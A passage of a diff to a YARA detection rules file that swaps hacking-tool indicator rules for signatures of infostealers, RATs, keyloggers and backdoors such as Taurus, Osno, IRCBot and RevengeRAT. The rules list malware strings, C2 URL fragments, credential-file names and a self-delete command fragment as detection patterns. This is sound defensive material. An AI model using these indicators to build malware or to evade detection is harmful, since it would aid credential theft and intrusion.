+		$s5 = "bot%telegramapi%" wide
+		$s6 = "KillTorProcess" fullword ascii
+		$s7 = "GetMozilla" ascii
+		$s8 = "torbrowser" wide
+		$s9 = "%chatid%" wide
+		$s10 = "logins" fullword wide
+		$s11 = "credential" fullword wide
+		$s12 = "AccountConfiguration+" wide
+		$s13 = "<a.+?href\\s*=\\s*([\"'])(?<href>.+?)\\1[^>]*>" fullword wide
+		$g1 = "get_Clipboard" fullword ascii
+		$g2 = "get_Keyboard" fullword ascii
+		$g3 = "get_Password" fullword ascii
+		$g4 = "get_CtrlKeyDown" fullword ascii
+		$g5 = "get_ShiftKeyDown" fullword ascii
+		$g6 = "get_AltKeyDown" fullword ascii
+		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
+		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
+		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
+		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
+		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or all of ( $w* ) )
+		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $* ) and all of ( $g* ) ) ) ) or ( 2 of ( $m* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_SCN_Nbtscan : FILE
+rule DITEKSHEN_MALWARE_Win_Taurus : FILE
 {
 	meta:
-		description = "Detects NBTScan scanner for open NETBIOS nameservers on a local or remote TCP/IP network"
+		description = "Taurus infostealer payload"
 		author = "ditekSHen"
-		id = "663c324e-4784-5efe-bbdf-60fa42e13944"
+		id = "c02114c1-9c97-5d0c-b7ce-1bd6a00a9e9a"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L402-L420"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1483-L1519"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a81b95ad60aac4d66586ae7dc61f6bcbe2b7185b66b2bb895f45abff3ad3f430"
+		logic_hash = "6039c27e69b47dfcc1327c34306627d2d9bd57f6bd365bb80b47ad21f892ae8a"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "[%s] is an invalid target (bad IP/hostname)" fullword ascii
-		$s2 = "ERROR: no parse for %s -- %s" fullword ascii
-		$s3 = "add_target failed" fullword ascii
-		$s4 = "   -p <n>    bind to UDP Port <n> (default=%d)" fullword ascii
-		$s5 = "process_response.c" fullword ascii
-		$s6 = "currTarget != 0" fullword ascii
-		$s7 = "parse_target.c" fullword ascii
-		$s8 = "dump_packet.c" fullword ascii
-		$s9 = "parse_target_cb.c" fullword ascii
-		$s10 = "DUMP OF PACKET" fullword ascii
-		$s11 = "lookup_hostname.c" fullword ascii
+		$s1 = "t.me/taurus_se" ascii
+		$s2 = "rus_seller@explo" ascii
+		$s3 = "/c timeout /t 3  & del /f /q" ascii
+		$s4 = "MyAwesomePrefix" ascii
+		$txt1 = "LogInfo.txt" fullword ascii
+		$txt2 = "Information.txt" fullword ascii
+		$txt3 = "General\\passwords.txt" fullword ascii
+		$txt4 = "General\\forms.txt" fullword ascii
+		$txt5 = "General\\cards.txt" fullword ascii
+		$txt6 = "Installed Software.txt" fullword ascii
+		$txt7 = "Crypto Wallets\\WalletInfo.txt" fullword ascii
+		$txt8 = "cookies.txt" fullword ascii
+		$url1 = "/cfg/" wide
+		$url2 = "/loader/complete/" wide
+		$url3 = "/log/" wide
+		$url4 = "/dlls/" wide
+		$upat = /\.exe;;;\d;\d;\d\]\|\[http/
+		$x1 = "Vaultcli.dll" fullword ascii
+		$x2 = "Bcrypt.dll" fullword ascii
+		$x3 = "*.localstor" ascii
+		$x4 = "operator<=>" fullword ascii
+		$x5 = ".data$rs" fullword ascii
+		$x6 = "https_discordap" ascii
+		$o1 = { 53 56 8b 75 08 8d 85 64 ff ff ff 57 6a ff 6a 01 }
+		$o2 = { 6a 00 68 00 04 00 00 ff b5 a8 fe ff ff ff b5 ac }
+		$o3 = { ff 75 0c 8d 85 44 ff ff ff 50 e8 aa f7 ff ff 8b }
+		$o4 = { 8b 47 04 c6 40 19 01 8d 85 6c ff ff ff 8b 0f 50 }
+		$o5 = { 8d 8d ?? ff ff ff e8 5b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 10 of ( $s* )
+		(( 3 of ( $s* ) or ( 6 of ( $txt* ) and 2 of ( $s* ) ) or ( $upat and 1 of ( $s* ) and 2 of ( $txt* ) ) or ( all of ( $url* ) and ( 2 of ( $txt* ) or 1 of ( $s* ) ) ) ) or ( uint16( 0 ) == 0x5a4d and all of ( $x* ) or ( all of ( $o* ) and 3 of ( $x* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_ENC_Bestcrypt : FILE
+rule DITEKSHEN_MALWARE_Win_Remoteutilitiesrat : FILE
 {
 	meta:
-		description = "Detects BestEncrypt commercial disk encryption and wiping software"
+		description = "RemoteUtilitiesRAT RAT payload"
 		author = "ditekSHen"
-		id = "30c3c17c-c951-5b14-80ba-eec7b2195985"
+		id = "1cf3ece1-e723-5302-9673-273381ba7a8b"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L442-L453"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1521-L1537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "77d338c6f3e4b733cb31eb1ae05e4ce8631812f7161bc70074a3fe1dee9df770"
+		logic_hash = "179a559f6a6ffbce31595bd613d338bb6ac40b8a083ed0169cde754b6ed756c7"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.RemoteUtilitiesRAT"
 
 	strings:
-		$s1 = "BestCrypt Volume Encryption" wide
-		$s2 = "BCWipe for " wide
-		$s3 = "Software\\Jetico\\BestCrypt" wide
-		$s4 = "%c:\\EFI\\Jetico\\" fullword wide
+		$s1 = "rman_message" wide
+		$s2 = "rms_invitation" wide
+		$s3 = "rms_host_" wide
+		$s4 = "rman_av_capture_settings" wide
+		$s5 = "rman_registry_key" wide
+		$s6 = "rms_system_information" wide
+		$s7 = "_rms_log.txt" wide
+		$s8 = "rms_internet_id_settings" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_CNC_Earthworm : FILE
+rule DITEKSHEN_MALWARE_Win_Slothfulmedia : FILE
 {
 	meta:
-		description = "Detects Earthworm C&C Windows/macOS tool"
+		description = "SlothfulMedia backdoor payload"
 		author = "ditekSHen"
-		id = "4a6edcf3-b3c4-5620-8eac-102b1ce425f8"
+		id = "e94b6d67-137c-5cfb-9c59-fbeb6cd85f0a"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L455-L471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1539-L1565"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5045faaaa9e60d4bd506240d51ff78dad4e89ccee0e824e7e5c309a8d3ae2883"
+		logic_hash = "6f742e8d9d555b44daaa09835f599c99e16cd39bb106c8f43fbbca7093de462e"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "lcx_tran 0.0.0.0:%d <--[%4d usec]--> %s:%d" fullword ascii
-		$s2 = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server" fullword ascii
-		$s3 = "rcsocks 0.0.0.0:%d <--[%4d usec]--> 0.0.0.0:%d" fullword ascii
-		$s4 = "rssocks %s:%d <--[%4d usec]--> socks server" fullword ascii
-		$s5 = "--> %3d <-- (close)used/unused  %d/%d" fullword ascii
-		$s6 = "<-- %3d --> (open)used/unused  %d/%d" fullword ascii
-		$s7 = "--> %d start server" ascii
-		$s8 = "Error on connect %s:%d [proto_init_cmd_rcsocket]" fullword ascii
-		$url = "http://rootkiter.com/EarthWrom/" nocase fullword ascii
+		$x1 = /ExtKeylogger(Start|Stop)/ fullword ascii
+		$x2 = /ExtService(Add|Delete|Start|Stop)/ fullword ascii
+		$x3 = /ExtRegKey(Add|Del)/ fullword ascii
+		$x4 = /ExtRegItem(Add|Del)/ fullword ascii
+		$x5 = "ExtUnload" fullword ascii
+		$s1 = "Local Security Process" fullword wide
+		$s2 = "Global%s%d" fullword wide
+		$s3 = "%s%s_%d.dat" fullword wide
+		$s4 = "\\AppIni" fullword wide
+		$s5 = "%s.tmp" fullword wide
+		$s6 = "\\SetupUi" fullword wide
+		$s7 = "%s|%s|%s|%s" fullword wide
+		$s8 = "\\ExtInfo" fullword wide
+		$cnc1 = "/v?m=" fullword ascii
+		$cnc2 = "%s&i=%d" fullword ascii
+		$cnc3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" fullword ascii
+		$cnc4 = "Content-Length: %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xfacf or uint16( 0 ) == 0x5a4d ) and ( 5 of ( $s* ) or $url )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 7 of ( $s* ) or all of ( $cnc* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Keychaindumper : FILE
+rule DITEKSHEN_MALWARE_Win_Ircbot : FILE
 {
 	meta:
-		description = "Detects macOS certificate/password keychain dumping tool"
+		description = "IRCBot payload"
 		author = "ditekSHen"
-		id = "cec094fa-c651-58a6-a306-f16d8603e536"
+		id = "69739d82-9760-5c4e-bf9e-60c60617a12a"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L473-L484"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1567-L1596"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f606bdd5dba2180ffc552c46373b52801a0bd65a538b381fb9f4240efc5bd458"
+		logic_hash = "1ea640202cfbd0c3425a192c45938f632dc644f41c7974118e7491b026122818"
 		score = 75
-		quality = 71
+		quality = 67
 		tags = "FILE"
-		clamav_sig = "INDICATOR_Osx.Tool.PWS.KeychainDumper"
 
 	strings:
-		$s1 = "_getEmptyKeychainItemString" fullword ascii
-		$s2 = "NdumpKeychainEntitlements" fullword ascii
-		$s3 = "_dumpKeychainEntitlements" fullword ascii
+		$s1 = ".okuninstall" fullword wide
+		$s2 = ".oksnapshot" fullword wide
+		$s3 = "\\uspread.vbs" fullword wide
+		$s4 = "KEYLogger" ascii nocase
+		$s5 = "GetKeyLogs" fullword ascii
+		$s6 = "GetLoocationInfo" fullword ascii
+		$s7 = "CaputerScreenshot" fullword ascii
+		$s8 = "get_SCRIPT_DATA" fullword ascii
+		$s9 = /irc_(server|nickname|password|channle)/ fullword ascii
+		$s10 = "machine_screenshot" fullword ascii
+		$s11 = "CollectPassword" fullword ascii
+		$s12 = "USBInfection" fullword ascii nocase
+		$cnc1 = "&command=UpdateAndGetTasks&machine_id=" wide
+		$cnc2 = "&machine_os=1&privateip=" wide
+		$cnc3 = "&command=InsertTaskExecution&excuter_id=" wide
+		$cnc4 = "&command=RegisterNewMachine" wide
+		$cnc5 = "&command=UpdateNewMachine" wide
+		$cnc6 = "&command=GetPayloads&keys=" wide
+		$cnc7 = "&command=SaveSnapshot" wide
+		$pdb = "\\Projects\\USBStarter\\USBStarter\\obj\\Release\\USBStarter.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf ) and all of them
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 3 of ( $cnc* ) or ( $pdb and 2 of them ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_P0Wnedshell : FILE
+rule DITEKSHEN_MALWARE_Win_Apocalypse : FILE
 {
 	meta:
-		description = "Detects compiled executables of p0wnedShell post-exploitation toolkit"
+		description = "Apocalypse infostealer payload"
 		author = "ditekSHen"
-		id = "7df8f9b4-48d3-5271-9d60-5dd4bfaed316"
+		id = "f1fa6642-fe42-57e7-a1bc-0f59815049f8"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L486-L512"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1598-L1615"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9745b69573bf695fdada122143fb1889a7b2025250b5fb1e8f1a86b3be6f27d3"
+		logic_hash = "d18ac492ad57cf390f20693cb47ae2c6e3dbdd921fa846130a4bc20047e1aa27"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Use WinRM, PsExec, SMB/WMI to execute commands on remote systems" wide
-		$s2 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" wide
-		$s3 = "-Command '\"lsadump::dcsync /user:" wide
-		$s4 = "-Payload windows/meterpreter/reverse_https -Lhost" wide
-		$s5 = "Get-Content ./EncodedPayload.bat" fullword wide
-		$e1 = "OnYNAB+LCAAAAAAABAC8vOeS60iSLvh75yly+rZZVxuqC4KQs3uvLQhFEJIACALoHVuD1oKQBMbuuy+Y4pw8dUTf3R+bZlWVZHh87uHh4vPItv63ZGrCMW+bF7GZ2zL+" wide
-		$e2 = "kuIeAB+LCAAAAAAABADsvWt327iuMPw9v0Jv27Wa7DqJc2ma5nl71vZFTpzx/ZJL+3TlyLZiq7EtjyTHcffZ//0BSEqiKEqWbKczs8941qS2LgAIAiAIguDjfNp3DHOq" wide
-		$e3 = "mZYIAB+LCAAAAAAABADsvflj2zyOMPx7/gptmnftbBIfuZp0t/OOfMZp7PjO0adfX9lSbCWy5Vp2HGfm+d8/ACQl6vCRNp2Z3bVmnioWSRAEQQAESfC/Pmwp8FTtmTFu" wide
-		$e4 = "u9YGAB+LCAAAAAAABADsvW1D40ayKPw9v0Lr4V7ZE8vY5mUY9rKJBzMTnmWAgyGTvYTlCluAdmzJK9nDsEn++1NV/S61ZJmXZJIN52wG7O7q6urq6qrqquoXSfDveZgE" wide
-		$e5 = "T3gDAB+LCAAAAAAABADtvX1f2zq2KPz3yafQzuZcwi5JEydQ2nM7v4cCnc0zQLmE7j3z6+7NmMQBnwY7YzsFTqff/WpJsi3Jki07DlA2mT008ctaS0tL601L0nThjSPX" wide
-		$e6 = "zRgDAB+LCAAAAAAABADtfW1327jR6OdHv4Kr9TmWdiVZkl+SdZs913Gcrm9tx7WcbvekuS4t0TYbiVRJKYmfbf77xeCNeCVBinKcbNStI5HAYDAYDAaDwczNMhovwjjy" wide
-		$e7 = "pxICAB+LCAAAAAAABADtvf17GkeyKPyz+Cvmlfw+ggRhfcXr1X1znsUIx5yVhC7IUbI+fnUHGKRZwww7M1jWyeZ/v1XV3z09wABysnviZ1cBpqe6urqquqq6uno8j4ZZ" wide
-		$e8 = "H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5" wide
-		$k1 = "EasySystemPPID" fullword ascii
-		$k2 = "EasySystemShell" fullword ascii
-		$k3 = "LatMovement" fullword ascii
-		$k4 = "ListenerURL" fullword ascii
-		$k5 = "MeterStager" fullword ascii
-		$k6 = "PatchEventLog" fullword ascii
+		$s1 = "OpenClipboard" fullword ascii
+		$s2 = "SendARP" fullword ascii
+		$s3 = "GetWebRequest" fullword ascii
+		$s4 = "DotNetGuard" fullword ascii
+		$s5 = "set_CreateNoWindow" fullword ascii
+		$s6 = "UploadFile" fullword ascii
+		$s7 = "GetHINSTANCE" fullword ascii
+		$s8 = "Kill" fullword ascii
+		$s9 = "GetProcesses" fullword ascii
+		$s10 = "get_PrimaryScreen" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 7 of ( $e* ) or all of ( $k* ) or ( 2 of ( $s* ) and 2 of ( $e* ) and 2 of ( $k* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Rubeus : FILE
+rule DITEKSHEN_MALWARE_Win_Osno : FILE
 {
 	meta:
-		description = "Detects Rubeus kerberos defensive/offensive toolset"
+		description = "Osno ransomware and infostealer payload"
 		author = "ditekSHen"
-		id = "5af8cee0-e664-5dfe-9932-0e74ed41b6b4"
+		id = "25ed5ad4-804a-5608-b6fe-a811ca6744d8"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L514-L531"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1617-L1652"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee817d23427970d7e77f9ce2a7cbc25c77177d81354fed83e7551cdcbc2d7cd2"
+		logic_hash = "3df59c306017001467a5f237db2ab37d97c34116558e18420a6a1f01f08f520f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$s1 = "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" fullword wide
-		$s2 = "(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" fullword wide
-		$s3 = "rc4opsec" fullword wide
-		$s4 = "pwdlastset" fullword wide
-		$s5 = "LsaEnumerateLogonSessions" fullword ascii
-		$s6 = "extractKerberoastHash" fullword ascii
-		$s7 = "ComputeAllKerberosPasswordHashes" fullword ascii
-		$s8 = "kerberoastDomain" fullword ascii
-		$s9 = "GetUsernamePasswordTGT" fullword ascii
-		$s10 = "WriteUserPasswordToFile" fullword ascii
+		$s1 = ".HolyGate+<>c+<<FinalBoss>" ascii
+		$s2 = /Osno(Keylogger|Stealer|Ransom)/ wide
+		$s3 = "password,executeWebhook('Account credentials" wide
+		$s4 = "-Name Osno -PropertyType" wide
+		$s5 = "process.env.hook" ascii
+		$s6 = "Stealer.JSON.JsonValue" ascii
+		$s7 = "<DetectBrowserss>b_" ascii
+		$s8 = "<TryGetDiscordPath>b_" ascii
+		$s9 = "antiVM" fullword ascii
+		$s10 = "downloadurl" fullword ascii
+		$s11 = "set_sPassword" fullword ascii
+		$txt0 = "{0} {1} .txt" fullword wide
+		$txt1 = "\\ScanningNetworks.txt" fullword wide
+		$txt2 = "\\SteamApps.txt" fullword wide
+		$txt3 = "-ErrorsLogs.txt" fullword wide
+		$txt4 = "-keylogs.txt" fullword wide
+		$txt5 = "Hardware & Soft.txt" fullword wide
+		$cnc0 = "/csharp/" ascii wide
+		$cnc1 = "token=" ascii wide
+		$cnc2 = "&timestamp=" ascii wide
+		$cnc3 = "&session_id=" ascii wide
+		$cnc4 = "&aid=" ascii wide
+		$cnc5 = "&secret=" ascii wide
+		$cnc6 = "&api_key" ascii wide
+		$cnc7 = "&session_key=" ascii wide
+		$cnc8 = "&type=" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		( uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $txt* ) or ( 4 of ( $s* ) and 2 of ( $txt* ) ) ) ) or ( 7 of ( $cnc* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_RTK_Hiddenrootkit : FILE
+rule DITEKSHEN_MALWARE_Win_Betabot : FILE
 {
 	meta:
-		description = "Detects the Hidden public rootkit"
+		description = "BetaBot payload"
 		author = "ditekSHen"
-		id = "c9e9d160-224f-505f-a135-56a9793f99c2"
+		id = "377c500c-5727-5bea-ac46-cb69c868a607"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L533-L554"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1654-L1666"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "20180fc040c1b988b17b1ca9b61a7dab5180df4961a00f0afcb03e2cbe99b28f"
+		logic_hash = "e594d01874ee622169d6708ddc6cfde7f1d26d2bea1604961dc860700e8a1d5d"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$h1 = "Hid_State" fullword wide
-		$h2 = "Hid_StealthMode" fullword wide
-		$h3 = "Hid_HideFsDirs" fullword wide
-		$h4 = "Hid_HideFsFiles" fullword wide
-		$h5 = "Hid_HideRegKeys" fullword wide
-		$h6 = "Hid_HideRegValues" fullword wide
-		$h7 = "Hid_IgnoredImages" fullword wide
-		$h8 = "Hid_ProtectedImages" fullword wide
-		$s1 = "FLTMGR.SYS" fullword ascii
-		$s2 = "HAL.dll" fullword ascii
-		$s3 = "\\SystemRoot\\System32\\csrss.exe" fullword wide
-		$s4 = "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\%wZ" fullword wide
-		$s5 = "INIT" fullword ascii
-		$s6 = "\\hidden-master\\Debug\\QAssist.pdb" fullword ascii
+		$s1 = "__restart" fullword ascii
+		$s2 = "%SystemRoot%\\SysWOW64\\tapi3.dll" fullword wide
+		$s3 = "%SystemRoot%\\system32\\tapi3.dll" fullword wide
+		$s4 = "publicKeyToken=\"6595b64144ccf1df\"" ascii
+		$s5 = "VirtualProtectEx" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $h* ) or 5 of ( $s* ) or ( 2 of ( $s* ) and 2 of ( $h* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PET_Sharphound : FILE
+rule DITEKSHEN_MALWARE_Win_Wshratplugin : FILE
 {
 	meta:
-		description = "Detects BloodHound"
+		description = "WSHRAT keylogger plugin payload"
 		author = "ditekSHen"
-		id = "d8f44e15-3e7c-5e5d-9d74-30c61e679fcb"
+		id = "45c4fc87-6c45-5cd7-9fc4-7d3ea664a740"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L556-L573"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1668-L1685"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bdf10d0aabd6c41e8dd1f87c0fa141f300d785146d059fcd301ec35f65fbe990"
+		logic_hash = "3feeab43b58b533b7d2d41a71f2107e6f05b9c54ff805607843d253cadbe9384"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
+		snort_sid = "920010-920012"
+		clamav_sig = "MALWARE.Win.Trojan.WSHRAT-KLG"
 
 	strings:
-		$id1 = "InvokeBloodHound" fullword ascii
-		$id2 = "Sharphound" ascii nocase
-		$s1 = "SamServerExecute" fullword ascii
-		$s2 = "get_RemoteDesktopUsers" fullword ascii
-		$s3 = "commandline.dll.compressed" ascii wide
-		$s4 = "operatingsystemservicepack" fullword wide
-		$s5 = "LDAP://" fullword wide
-		$s6 = "wkui1_logon_domain" fullword ascii
-		$s7 = "GpoProps" fullword ascii
-		$s8 = "a517a8de-5834-411d-abda-2d0e1766539c" fullword ascii nocase
+		$s1 = "GET /open-keylogger HTTP/1.1" fullword wide
+		$s2 = "KeyboardChange: nCode={0}, wParam={1}, vkCode={2}, scanCode={3}, flags={4}, dwExtraInfo={6}" wide
+		$s3 = "MouseChange: nCode={0}, wParam={1}, x={2}, y={3}, mouseData={4}, flags={5}, dwExtraInfo={7}" wide
+		$s4 = "sendKeyLog" fullword ascii
+		$s5 = "saveKeyLog" fullword ascii
+		$s6 = "get_TotalKeyboardClick" fullword ascii
+		$s7 = "get_SessionMouseClick" fullword ascii
+		$pdb = "\\Android\\documents\\visual studio 2010\\Projects\\Keylogger\\Keylogger\\obj\\x86\\Debug\\Keylogger.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_UAC_NSISUAC : FILE
+rule DITEKSHEN_MALWARE_Win_Revengerat : FILE
 {
 	meta:
-		description = "Detects NSIS UAC plugin"
+		description = "RevengeRAT and variants payload"
 		author = "ditekSHen"
-		id = "4a7c20f6-bf0e-55fb-a0b9-7b51e4af7cd3"
+		id = "7d725050-108c-54b5-978e-2dd2124f5b0f"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L575-L587"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1687-L1713"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48c0247c789328a0ff62816f5d6ecac7a0f2a3fe2cb95d99c0e7d988147f7137"
+		logic_hash = "be9e50052f45b94d5995db723dd64d16a91c5ba0d3f589c018155c0cce45124f"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		snort_sid = "920000-920002"
 
 	strings:
-		$s1 = "HideCurrUserOpt" fullword wide
-		$s2 = "/UAC:%X /NCRC%s" fullword wide
-		$s3 = "2MyRunAsStrings" fullword wide
-		$s4 = "CheckElevationEnabled" fullword ascii
-		$s5 = "UAC.dll" fullword ascii
+		$l1 = "Lime.Connection" fullword ascii
+		$l2 = "Lime.Packets" fullword ascii
+		$l3 = "Lime.Settings" fullword ascii
+		$l4 = "Lime.NativeMethods" fullword ascii
+		$s1 = "GetAV" fullword ascii
+		$s2 = "keepAlivePing!" fullword ascii wide
+		$s3 = "Revenge-RAT" fullword ascii wide
+		$s4 = "*-]NK[-*" fullword ascii wide
+		$s5 = "RV_MUTEX" fullword ascii wide
+		$s6 = "set_SendBufferSize" fullword ascii
+		$s7 = "03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8" fullword ascii
+		$s8 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
+		$s9 = "\\RevengeRAT\\" ascii
+		$q1 = "Select * from AntiVirusProduct" fullword ascii wide
+		$q2 = "SELECT * FROM FirewallProduct" fullword ascii wide
+		$q3 = "select * from Win32_Processor" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $l* ) and 3 of ( $s* ) ) or ( all of ( $q* ) and 3 of ( $s* ) ) or 3 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_REM_Intelliadmin : FILE
+rule DITEKSHEN_MALWARE_Win_TRAT : FILE
 {
 	meta:
-		description = "Detects commerical IntelliAdmin remote tool"
+		description = "TRAT payload"
 		author = "ditekSHen"
